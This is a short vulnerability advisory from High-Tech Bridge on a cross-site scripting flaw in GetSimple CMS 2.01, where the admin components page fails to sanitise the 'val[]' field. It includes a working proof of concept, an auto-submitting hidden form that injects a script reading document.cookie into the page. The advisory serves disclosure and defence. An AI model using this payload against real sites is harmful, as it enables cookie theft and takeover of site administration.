GetSimple CMS 2.01 Cross Site Scripting

`Vulnerability ID: HTB22375  
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_getsimple_cms.html  
Product: GetSimple CMS  
Vendor: Cagintranet Networks  
Vulnerable Version: 2.01 and Probably Prior Versions  
Vendor Notification: 10 May 2010   
Vulnerability Type: XSS (Cross Site Scripting)  
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response  
Risk level: Medium   
Credit: High-Tech Bridge SA (http://www.htbridge.ch/)   
  
Vulnerability Details:  
User can execute arbitrary JavaScript code within the vulnerable application.   
  
The vulnerability exists due to failure in the "/admin/components.php" script to properly sanitize user-supplied input in "val[]" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.  
  
An attacker can use browser to exploit this vulnerability. The following PoC is available:   
  
  
<form action="http://example.com/admin/components.php" method="post" name="main" accept-charset="utf-8" >  
<input type="hidden" name="submitted" value="Save Components" />  
<input name="val[]" type="hidden" value='Some text here..."><script>alert(document.cookie)</script>' />  
<input type="hidden" name="slug[]" value="sidebar" />  
<input type="hidden" name="title[]" value="Sidebar" />  
<input type="hidden" name="id[]" value="0" />  
<input type="hidden" name="val[]" value="Just Another GetSimple Website" />  
<input type="hidden" name="slug[]" value="tagline" />  
<input type="hidden" name="title[]" value="Tagline" />  
<input type="hidden" name="id[]" value="1" />  
</form>  
<script>  
document.main.submit();  
</script>  
  
  
  
`